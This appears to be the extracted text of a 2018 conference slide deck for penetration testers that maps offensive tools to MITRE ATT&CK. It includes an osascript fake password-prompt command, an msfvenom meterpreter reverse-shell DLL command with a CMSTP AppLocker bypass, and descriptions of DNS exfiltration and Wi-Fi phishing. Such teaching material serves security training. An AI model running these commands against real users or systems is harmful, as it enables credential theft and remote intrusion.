weapons of a pentester - sector · 2019. 2. 11. · in 2018 i stumbled upon something truly...

PA

GE

1

www.AleksSecurity.com

Aleks Security Cyber Security Inc.www.AleksSecurity.com

2018 Oct

Understanding the virtual & physical tools used by white/black hat hackers

Weapons of a Pentester

PRESENTER: Nick Aleks

PA

GE

2


Disclaimer

This presentation is intended for professional SECTOR attendees and may contain information, content or opinions that could offend overly sensitive persons.

I will showcasing and demoing tools that could be used to breach computers, networks, and security controls.

By no means am I endorsing the illegal use of these tools.

No individuals, equipment or animals were harmed while developing this presentation.

The thoughts and opinions within this presentation are my own. I speak for no one, no one speaks for me.

PA

GE

3


Nick Aleks

[email protected]

Penetration Tester;

From Toronto

[email protected]

DEFCON Toronto – DC416https://www.meetup.com/DEFCON416

dc416.com

@Nick_Aleks

mailto:[email protected]


https://www.meetup.com/DEFCON416

http://www.dc416.com/

PA

GE

4


The History of this PresentationThe right tool – for the right job

Why have I given this talk for 3 years in a row?

- Sharing my knowledge as a pentester- Meet amazing people in the industry- Showing off some of the cool toys- Tango with the demo gods- Make hackers better

PA

GE

5


2018 Edition of this talk is a special oneIn 2018 I stumbled upon something truly beautiful

However, I have slowly realized that this was more than just typically showing off some cool tools and how they may be used in your next engagement.

Previous talks in the past had little to no structure but now I wanted to completely reorganize my talk to fit the new trend taking our industry by storm.

The first tool I’ll be showing off to you all is….

PA

GE

6


MITREATT&CK

Framework

PA

GE

7


PA

GE

8


What is MITRE ATT&CK?What are we talking about today?

Adversarial Tactics, Techniques & Common Knowledge

A framework that breaks down the complex POST-EXPLOIT cyber-attacks into individual units/blocks

Mapping MITRE benefits- SIEM rules- EDR detections- APT Threat Intelligence- Map to great pentests ☺

https://attack.mitre.org

the matrix goes on…

Tactics

Techniques

https://attack.mitre.org/

PA

GE

9


What is MITRE ATT&CK?What are we talking about today?

Tactics are divided into 11 categories from Initial Access, Persistence, Lateral Movement to Collection and Exfiltration.

Within each of these Tactics we find a great number of Techniques.

https://attack.mitre.orgExample: Persistence Technique

https://attack.mitre.org/

PA

GE

10


Why map tools to the ATT&CK framework?What are we talking about today?

5 Great reasons- Use the right tool for the right job (if your stuck trying to figure out a way to exfiltrated data)- Gain deeper understanding of the tools you already have (stop using your expensive tools for 1 task)- Compare similar tools and improve PoC testing- Fine-tune tools and better emulate APTs- Identify gaps in currently tooling capabilities (stuff the industry needs)

MITRE ATT&CK has literally became my north-star/map on both the Red & the Blue team side of security

Great community of infosec professionals have doing some amazing things with the framework (google it)

I’m working on some amazing non-pentest engagement related projects regarding this framework.

So stay tuned.. ☺

PA

GE

11


What is a tool?What a tool is in regards to this talk

Nicks Definition:

“Something that helps you get the job done and/or teaches you how to get the job done.”

This can include:- Physical Equipment- Frameworks- Software- Mobile Apps- Widget/Plugins- Book/Guides- YouTube Video/Talks- Websites- Commands- Phrase, Email, Speaking Script and Persona & Clothing (social

eng)

PA

GE

12


Lock picking

Not really mapped to MITRE“Initial Access” - Tactic“Physical Security Compromise”

PA

GE

13


The Art of pickingHow does one pick a lock?

A tension wrench (or torque wrench) is used to apply a torque to the cylinder, while a lock pick (or picklock) is used to push individual pins up until they are flush with the shear line.

Raking or scrubbing a pin tumbler lock is usually done before individual pins are pushed up. While applying torque with the tension wrench, a lock pick with a wide tip is placed at the back of the lock and quickly slid outwards with upward pressure so all the pins are pushed up.

PA

GE

14


Snap gunThe automated lock picking gun

The snap gun strikes all of the bottom pins at once with a strong impact, and then withdraws again. The bottom pins transfer their kinetic energy to the top pins and come to a complete stop without penetrating the lock housing.

How does it work?

10-30sec

How long does it take?

https://www.sparrowslockpicks.ca/


PA

GE

15


Lock picking gearA great place to pickup your gear

https://www.sparrowslockpicks.ca/• Dimple Picks• DIY PICKS• New Stuff• Blade Magazine Halo Points• Lock Pick sets Beginner• Lock Pick sets Advanced• Euro Lock Pick Sets• Military Lock Picks• The MONSTRUM• VORAX• Hooks & Rakes lock pick sets• Warded picks and wafer lock picks• Snap Gun• ByPass Drivers• ByPass Tools• Sparrows Jim• Padlock Shims• Practice Locks• Cut Away Locks• UNCUFF LINK cufflink• Handcuff Key• Elevator Key Set• Bump Keys• Lock Busters• Pinning Mat• Pinning Tweezers• Cases• Tension wrenches• Sparrows Lock Pick Reviews• Single Picks


https://www.sparrowslockpicks.ca/category_s/108.htm






























PA

GE

16


Initial AccessDrive-by Compromise Tools

T1189

PA

GE

17


Browser Exploitation Framework - BeEFT1189 Drive-by Compromise

BeEF is short for The Browser Exploitation Framework. - It is a penetration testing tool that focuses on the

web browser.- Simulate web-borne attacks against clients,

including mobile clients, - Client-side attack vectors. Unlike other security

frameworks, - BeEF looks past the hardened network perimeter

and client system, and examines exploitability within the context of the one open door: the web browser.

PA

GE

18


How it works?T1189 Drive-by Compromise

https://beefproject.com/

BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.

https://beefproject.com/

PA

GE

19


Other Drive-by Compromise/Webapp Hacking ToolsT1189 Honorable mentions tools

Tool Description URL

Python Webserver Simple webserver you can host on an attacker machine that will allow you to host a malicious payload that can be downloaded by the victim

https://docs.python.org/2/library/simplehttpserver.html

Software: XSSER Cross Site "Scripter" (aka XSSer) is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based applications.

https://xsser.03c8.net/

Software: Burp Suite Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities.

http://portswigger.net/burp/

Software: DirBuster DirBuster is a multi threaded java application designed to brute force directories and files names on web/application servers.

https://www.owasp.org/index.php/Category:OWASP_DirBuster_Project

Blog: Side-channel attacking browsers through CSS3 features

With the staggering amount of features that were introduced through HTML5 and CSS3 the attack surface of browsers grew accordingly.

https://www.evonide.com/side-channel-attacking-browsers-through-css3-features/

https://docs.python.org/2/library/simplehttpserver.html

https://xsser.03c8.net/

http://portswigger.net/burp/


https://www.evonide.com/side-channel-attacking-browsers-through-css3-features/

PA

GE

20


Initial AccessHardware Addition Tools

T1200

I’m in.

PA

GE

21


T1200 Hardware Addition ToolsWhat is this little USB?

Computer accessories, computers or networking hardware may be introduced into a system as a vector to gain execution.

While public references of usage by APT groups are scarce, many penetration testers leverage hardware additions for initial access.

Commercial and open source products are leveraged with capabilities such as - Passive networking tapping- Man-in-the-middle- Keystroke injection- Kernel Memory reading- Wireless access to a network- And the list goes on…

PA

GE

22


The LAN TurtleWhat is this little USB?

The LAN turtle is a covert Systems AdministrativeAnd Penetration testing tool.

It is a stealth remote access, network intelligence gathering and man-in-the-middleHoused within a generic “USB Ethernet Adapter Case”, the LAN turtles appearance allows it to blend into many environments

Drop it on a LAN and access it from anywhere via SSH, Meterpreter and Open VPN.

PA

GE

23


The Keygrabber KeyloggerWhat is this little USB device?

Pros- inline hardware-based keystroke recorder- Plugs into computer USB and keyboard USB plugs into it (literally plug-n-

play)- 8GB encrypted memory- Windows/Linux/Mac (No driver)

Cons:- Require physical access to retrieve keystroke contents- Only works best on the back of desktop towns/docking stations- Doesn’t really work on laptops

http://www.keelog.com

http://www.keelog.com/

PA

GE

24


The AirDrive KeyloggerWifi enabled keystroke streaming keylogger

Pros- Wifi-hotspot/device that is easily connected to by attacking computer- Plugs into computer USB and keyboard USB plugs into it (literally plug-n-

play)- Access data from a web browser- Can send email reports with data- Time stamping- Live-streamingCons:- Only works best on the back of desktop towns/docking stations- Doesn’t really work on laptops



PA

GE

25


Keylogger Use CasesNot just to extract Passwords

Use Cases- Profile employee/users behavior

- List most visited websites/servers/urls

- Read emails before they are even sent

- Understand business processes and points of contact

- Extract IP/code/configurations/IP address

- Extract chat/IM messages between employees



PA

GE

26


A great list of hardware addition tools (buy these in bulk)A list of stuff you should buy in bulk, because you will lose some of them during engagements


Bash Bunny USB gigabit Ethernet, serial, flash storage and keyboard emulator https://www.hak5.org/shows/hak5-gear

USB Rubber Ducky Keystroke injection tool disguised as a generic flash drive. https://www.hak5.org/shows/hak5-gear

Packet Squirrel Stealthy pocket-sized network man-in-the-middle device https://www.hak5.org/shows/hak5-gear

LAN Turtle USB Ethernet adapter backdoor and man-in-the-middle device https://www.hak5.org/shows/hak5-gear

Keygrabber USB In-line keylogger (keyboard keystroke recorder) http://www.keelog.com/usb-keylogger/

Raspberry Pi 3 Model B+ 64-bit quad-core processor, dual-band wireless LAN, Bluetooth 4.2/BLE, faster Ethernet, and Power-over-Ethernet mini-computer

https://www.raspberrypi.org

Arduino Uno Rev3/Nano

(distraction/covert operations)

Programmable microcontroller board. It has 14 digital input/output pins (of which 6 can be used as PWM outputs), 6 analog inputs

https://store.arduino.cc/usa/arduino-uno-rev3

https://www.hak5.org/shows/hak5-gear




http://www.keelog.com/usb-keylogger/

https://www.raspberrypi.org/

https://store.arduino.cc/usa/arduino-uno-rev3

PA

GE

27


Initial AccessSpear-phishing

Attachment/Link ToolsT1192/T1193

PA

GE

28


Social Engineering Toolkit (SET)T1192/T1193 Spear-phishing attachment/Link

Spear phishing attack vector option built into SET

SET allows you to craft an attack, integrate into a mail provider (GMAIL) and send a malicious payload (PDF) to the victim.

Allows you to create and save your own templates to use for future SE (Social Engineering) attacks

As easy following the SET menu or you can go ahead and create your own FileFormat payload

https://github.com/trustedsec/social-engineer-toolkit


PA

GE

29


Phishing Dark WatersBlue team books help drive red team ideas

When it comes to spear-phishing your targets its great to have examples of known attacks.

Books like Phishing Dark Waters allows you to pick and choose the types of elements within an phishing campaign to include/not include.

There are a massive number of clues/hints employees have been trained to look out for before clicking links/attachments within emails.

Be sure to hold your spear-phishing to a quality assurance test by measuring against commonly known indicators of suspicious email.

Have a team mate or third-party review your spear-phish email before delivering it in order to remove any personal bias, human/logic errors.

PA

GE

30


T1194 - Spearphishing via Service ToolsHow are they different?

• Spearphishing isn’t just about clicking links or download attachments

• Spearphishing via service is a specific variant of spearphishing.

• It employs the use of third party services rather than directly via enterprise email channels.

• All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry.

• Adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services.

• These services are more likely to have a less-strict security policy than an enterprise.

• Some of my fav tools combine the elements of social engineering & scripting/tech & hardware tooling

PA

GE

31


T1194 - Spearphising via Wifi - WifiphiserT1194 – Spearphishing via Service Tool

Step 1 Victim becomes deauthenticated from their access point

Victim joins a rogue access point.

Victim is being served a realistic router config-looking page

Githubhttps://github.com/sophron/wifiphisher

Wifiphisher is a security tool that mounts automated phishing attacks against WiFi networks in order to obtain secret passphrases or other credentials. It is a social engineering attack that unlike other methods it does not include any brute forcing.

Step 2

Victim types password

Step 3

Step 4

PA

GE

32


The Requirements – x2 Wireless cardsHow can we start playing with wifiphisher

✓ Kali Linux

✓ Two wireless network cards,

✓ Capable of injection/monitor mode

Needs TP-LINK TL-WN722N

✓ 150 Mbps

✓ 4dBi detachable antenna

✓ $12 on amazon

PA

GE

33


Wifiphisher – How it worksTake a look at wifiphiser

PA

GE

34


Jamming Interface

PA

GE

35


Router firmware upgrade

WPA2 Enterprise - Add a new form input (username)

PA

GE

36


Free Internet!

PA

GE

37


Mac OSX Wireless Networking Connection Spoofing

PA

GE

38


Spearphishing ToolsT1192/T1193 Spearphishing Attachment/Link Tools


Social Engineering Toolkit Manual SET User Manual 6.0 By David Kennedy https://github.com/trustedsec/social-engineer-toolkit

Phishing Dark Waters: The Offensive and Defensive Sides of Malicious Emails

An essential anti-phishing desk reference for anyone with an email address. Phishing Dark Waters addresses the growing and continuing scourge of phishing emails, and provides actionable defensive techniques and tools to help you steer clear of malicious emails.

https://www.amazon.ca/Phishing-Dark-Waters-Offensive-Defensive/dp/1118958470

Spear-Phishing With the Social Engineering Toolkit Tutorial

A tutorial, outlining creating a spear-phishing attack, sending a malicious file through an email using SET

https://www.youtube.com/watch?v=5BY_vYOik_U

Wifiphisher Github Repo Wifiphisher is a rogue Access Point framework for conducting red team engagements or Wi-Fi security testing. Using Wifiphisher, penetration testers can easily achieve a man-in-the-middle position against wireless clients by performing targeted Wi-Fi association attacks.

https://github.com/wifiphisher/wifiphisher


https://www.amazon.ca/Phishing-Dark-Waters-Offensive-Defensive/dp/1118958470

https://www.youtube.com/watch?v=5BY_vYOik_U

https://github.com/wifiphisher/wifiphisher

PA

GE

39


ExecutionApplescript

T1155

PA

GE

40


T1155 - ApplescriptExecution on Mac OSX computers via applescript

• macOS and OS X applications send AppleEvent messages to each other for interprocesscommunications (IPC).

• These messages can be easily scripted with AppleScript for local or remote IPC.

• Osascript executes AppleScript and any other Open Scripting Architecture (OSA) language scripts.

• A list of OSA languages installed on a system can be found by using the osalangprogram.

• AppleEvent messages can be sent independently or as part of a script. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.

• Adversaries can use this to interact with

– open SSH connections

– move to remote machines

– present users with fake dialog boxes.

PA

GE

41


T1155 – Applescript ExampleExecution on Mac OSX computers via applescript

A simple applescript open scripting architecture (osa) command that will prompt the user for a password in order to upgrade their current Mac Operating System. Password is returned in plain text to stout.

osascript -e 'display dialog "Required System Upgrade. Please enter passphrase." default answer "" with icon stop buttons {"Continue"} default button "Continue" with hidden answer'

PA

GE

42


Applescript ToolsT1155 Applescript Tools


Attack Mac OSX Dan Tentler gave a talk at LayerOne 2016 https://www.youtube.com/watch?v=buvhi77_MI4

Password Prompt A simple applescript that will prompt the user for a password in order to upgrade their current Mac Operating System. Password is returned in plain text to stout.

https://gist.github.com/nicholasaleks/c272c2630791e612eca6bbf013b5bbf4

Learn AppleScript: The Comprehensive Guide to Scripting and Automation on Mac OS X, Edition 3

Learn AppleScript: The Comprehensive Guide to Scripting and Automation on Mac OS X, Edition 3

https://goo.gl/DpaUUa

APPLESCRIPT IN A NUTSHELL: A DESKTOP QUICK REFERENCE

APPLESCRIPT IN A NUTSHELL: A DESKTOP QUICK REFERENCE https://goo.gl/GG5LVD

https://www.youtube.com/watch?v=buvhi77_MI4

https://gist.github.com/nicholasaleks/c272c2630791e612eca6bbf013b5bbf4

https://goo.gl/DpaUUa

https://goo.gl/GG5LVD

PA

GE

43


ExecutionCMSTPT1191

PA

GE

44


T1191 CMSTP ToolsLOLBAS – living off the land binaries and scripts

Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles.

Trusted built-in Windows binary

- Not only an execution tactic but also- Defence evasion- Persistence

It accepts an installation file (INF) and installs a service profile leveraged for remote access connections.

Adversaries may supply CMSTP.exe with infected INF files to load and execute DLLs and/or COM scriptlets (SCT)

PA

GE

45


T1191 CMSTPLets bypass Applocker! Example by netbiosX (pentestlab.blog)

Good tutorial on using CMSTP to bypass AppLocker:

1. Generate DLLmsfvenom -p windows/x64/meterpreter/reverse_tcpLHOST=10.0.0.2 LPORT=4444 -f dll –o /root/Desktop/pentestlab.dll

2. Generate malicious INF file which references your DLL

3. Execute - cmstp.exe /s cmstp.inf

https://pentestlab.blog/2018/05/10/applocker-bypass-cmstp/


PA

GE

46


CMSTP ToolsT1191 CMSTP Tools


Leveraging INF-SCT Fetch & Execute Techniques For Bypass, Evasion, & Persistence (Part 1/2)

Blog article outline how to create a malicious DLL, INF and execute cmstp.exe

https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/

https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/

AppLocker Bypass – CMSTP Blog article outline how to create a malicious DLL, INF and execute cmstp.exe


CMSTP Microsoft Doc Windows IT Pro Center Documentationcmstp.exe [/nf] [/ni] [/ns] [/s] [/su] [/u] [Drive:][path]ServiceProfileFileName.inf"

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmstp

CMSTP.exe - remote sctexecution video

Nicky Tyrer Jan 30, 2018 CMSTP.exe (Microsoft Connection Manager Profile Installer) can invoke DllInstall from scrobj.dll. Therefore remote COM scriplets can be executed.

https://www.youtube.com/watch?v=gzBBdoKv0OM




https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmstp

https://www.youtube.com/watch?v=gzBBdoKv0OM

PA

GE

47


ExecutionPowershell Tools

T1086

PA

GE

48


T1086 - EmpirePowershell/Python Post-exploitation Framework

• Empire is a post-exploitation framework that includes:• PowerShell2.0 Windows agent, • Python 2.6/2.7 Linux/OS X agent. • The framework is similar to Metasploit however it has a dedicated

focus on Windows targets• Great tool for not only execution but persistence and privilege

escalation techniques• 3 Main components:

– A listener is a process which listens for a connection from the machine we are attacking. This helps Empire send the loot back to the attacker's computer.

– A stager is a snippet of code that allows malicious code to be run via the agent on the compromised host.

– An agent is a program that maintains a connection between your computer and the compromised host.

– Check out empire and learn more at:https://github.com/EmpireProject/Empire/wiki/Quickstart

https://github.com/EmpireProject/Empire/wiki/Quickstart

PA

GE

49


T1086 - PowerSploitPowershell Tool

PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following script categories :

• CodeExecution

• ScriptModification

• Persistence

• AntivirusBypass

• Exfiltration

• Mayhem

• Privesc

• Recon

https://github.com/PowerShellMafia/PowerSploit

https://github.com/PowerShellMafia/PowerSploit

PA

GE

50


T1086 – Atomic Red TeamPowershell Based Attacks

A great tool not only for executing powershellattacks but also other MITRE ATT&CK techniques.

Pros:

- Simple one-liner attacks

- Fairly good coverage (not 100%)

- Easy to use

- Good community support/contribution

Cons:

- No built in validation or clean up scripts

PA

GE

51


PowerShell ToolsT1086 Powershell Tools


Fileless PowerShell Attack A brief demonstration of Cybereason blocking a filelessPowerShell-based attack

https://www.youtube.com/watch?v=Hc7h-rIyd5A

Windows PowerShell Cookbook The Complete Guide to Scripting Microsoft's Command Shell https://goo.gl/qnYpPb

Byt3bl33d3r Blog(byte bleeder)

Great blog that posts on python scripted tools from byt3l33d3r github repo

https://byt3bl33d3r.github.io/automating-the-empire-with-the-death-star-getting-domain-admin-with-a-push-of-a-button.html

Atomic Red Team T1086 –PowerShell Attacks

Atomic Red Team is a library of simple tests that every security team can execute to test their controls. Tests are focused, have few dependencies, and are defined in a structured format that be used by automation frameworks.

https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1086/T1086.md

PSAttack A portable console aimed at making pentesting with PowerShell a little easier.

https://github.com/jaredhaight/PSAttack

https://www.youtube.com/watch?v=Hc7h-rIyd5A

https://goo.gl/qnYpPb

https://byt3bl33d3r.github.io/automating-the-empire-with-the-death-star-getting-domain-admin-with-a-push-of-a-button.html

https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1086/T1086.md

https://github.com/jaredhaight/PSAttack

PA

GE

52


DiscoverySystems Network

Connections DiscoveryT1049

PA

GE

53


T1049 - G-MoNWireless Network Mapping Application

Powerful WarDriving scanner and GSM / CDMA / EVDO / UMTS and LTE Netmonitor and drive test tool with voice notifications.

It scans for all WiFi networks in range & saves the data with GPS coordinates into a file on your sd card.

You can create a kml file for Google Earth. It shows you the encrytion, channel an signal strength. It shows all APs in range in a live map.

https://play.google.com/store/apps/details?id=de.carknue.gmon2&hl=en

https://play.google.com/store/apps/details?id=de.carknue.gmon2&hl=en

PA

GE

54



PA

GE

55



PA

GE

56



PA

GE

57


NooElec NESDR Mini USB RTL-SDRSDR = Software Defined Radio

USB Software Defined Radio. Used to listen to radio frequencies and display their outputs into your computer

What is it?

- ADS-B (automatic dependent surveillance broadcast)- Police & Fire Scanning- Trucking- Car FOB scanning- Garage door scanning- Gate entry scanning- Satellite images - https://www.rtl-sdr.com/rtl-sdr-

tutorial-receiving-noaa-weather-satellite-images/- Personally I feel like this little guy out-performs

devices x10 its cost

Capabilities?

https://www.rtl-sdr.com/rtl-sdr-tutorial-receiving-noaa-weather-satellite-images/

PA

GE

58


GQRXSDR = Software Defined Radio

Supports hardware equipment SDR, HackRF, Airspy, Funcube Dongles, etc

What is it?

- Discover connected radio devices- Process I/Q data from devices- Change frequency gain and apply various corrections- Mono/Stereo demodulators- Record and playback audio/raw baseband- Spectrum analyser mode

Capabilities?

http://gqrx.dk/

http://gqrx.dk/

PA

GE

59


YARD Stick 1Sub 1GHz RF transmitter & receiver

Yet Another Radio Dongle can transmit and receive digital wireless signals at frequencies below 1 GHz.

What is it?

YARD stick 1 comes with RfCat firmware installed.RfCAT allows you to interactively control the dongle with a python shell

How does it work?

- Half-duplex transmit and receive- Mods: ASK, OOK, GFSK, 2-FSK, 4-FSK, MSK- Data rates up to 500kbps- Full-speed USB 2.0

Capabilities?

PA

GE

60


Some Radio Operated Security ControlsDoors, Gates, Barriers, Cars

PA

GE

61


What I hacked last yearRF Lamp

PA

GE

62


Command & ControlCommonly Used Ports

T1043

PA

GE

63


T1043 - dnscat2Encrypted data Exfiltration and C2

Adversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend with normal network activity to avoid more detailed inspection.

This tool is designed to create an encrypted Command and Control (C2) channel over the DNS protocol, which is an effective tunnel out of almost every network

C2 and exfiltration over DNS provides a great mechanism to hide your traffic, evade network sensors, and get around network restrictions.

https://github.com/iagox86/dnscat2

https://github.com/iagox86/dnscat2

PA

GE

64


T1043 - dnscat2 – How does it work?Encrypted data Exfiltration and C2

- Two sides (client & server side)- Client is C based and runs on minimal dependencies- Server is ruby based and requires a few gem

dependencies

- When you run the client you would specify a domain name

- All requests will be sent to local DNS which will be redirected to the authoritative DNS server (which you own)

- If you don’t have the authoritative DNS server you can run direct UDP/53 (which will probably get caught by firewall/network monitoring pretty easily)

- Great for tunneling any data from client to server with no protocol, upload/download files, shells, etc

- Also, its encrypted by default

PA

GE

65


DiscoveryNetwork Service Scanning

T1046

PA

GE

66


Network Service ScanningToolsT1046 Systems Network Connection Discovery Tools


Nikto Nikto Package Description Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/programs

https://www.cirt.net/Nikto2

DirBuster DirBuster is a multi threaded java application designed to brute force directories and files names on web/application servers.


Nmap Nmap ("Network Mapper") is a free and open source (license) utility for network discovery and security auditing.

http://nmap.org/

https://www.cirt.net/Nikto2


http://nmap.org/

PA

GE

67


Questions?

[email protected]

Penetration Tester;

From Toronto

[email protected]

DEFCON Toronto – DC416

dc416.com

Organizer

@Nick_Aleks

Tweet me your feedback!



http://www.dc416.com/

weapons of a pentester - sector · 2019. 2. 11. · in 2018 i stumbled upon something truly...

Documents